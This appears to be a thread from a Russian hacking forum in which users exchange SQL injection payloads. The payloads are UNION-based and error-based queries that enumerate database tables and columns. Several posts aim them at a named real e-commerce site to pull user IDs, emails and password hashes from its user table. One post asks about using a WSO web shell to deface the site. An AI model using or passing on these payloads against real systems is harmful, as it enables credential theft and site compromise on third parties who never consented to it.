Вот пример, читай то что пониже https://forum.antichat.ru/thread119047.html Потом гугли другие способы, если этот не прокатит.
я читал эту и другие статьи по инъекциям несколько раз. если бы я знал ответ, то не спрашивал. ты можешь предложить что-то конкретное? гуглить не подходит
Не груби, тут тебе никто ничем не обязан. Как я понял, проблема в том, что параметр id обрамлен кавычками и тебе не составить верный запрос. Крути так: HTML: -99999'+union+select+1,2,3+and+'1'='1 HTML: -99999'+union+select+1,version(),3+and+'1'='1 HTML: -999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3+and+'1'='1 И так далее Либо отсеки ненужное комментарием -- - HTML: -999999'+union+select+1,((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1)),3-- - UPDATE: Вот тебе через ошибку HTML: -9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1 и аналогично с -- - HTML: -9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)-- -
Redwood, я в курсе, что мне тут никто ничем не обязан и я не грублю. сам посуди, ответы или можно было просто не писать. по твоему ответу, я написал, что в скрипте следующий запрос - UPDATE, который выплевывает ошибку. а за HTML: -9999'+or+1+group+by+concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))+having+avg(0)+and+'1'='1 спасибо
http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434%20or%20(1,23)=(select+1+from+(select+count(0),concat((select+concat(ID,Email)+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)-- --> Duplicate entry '[email protected]' for key 1 but this is not working! http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count(0),concat((select+concat(Password)+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
Можеш объяснить подробнее или дать линк на какой нить ман, шелл wso, safe mode off, нехватает прав править морду.
да мануала как такогог нет, есть выдумка и способы обхода хитростей админа..стандартного нет ничего..все по разномy
You can use substring function to solve this problem Code: http://www.eluxbag.com/product.php?page=1&ordertype=3&keyword=&type=products&Categories=&perpagenum=32&id=434 or (1,23)=(select+1+from+(select+count( 0),concat((select+concat(ID,0x3a,substring(password,1,32))+from+userinfo+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
там берется path из url-а, в котором браузер заменяет пробелы на %20, соответственно эти %20 попадают в запрос. Пробовал передать вручную Path без пробелом - нгинкс возвращает ошибку bad request. так что видимо не получится ничего сделать как оказалось, сайт делала одна "студия", которая уже сделала довольно много сайтов (в портфолио около 100), и на всех то самое... обидно)
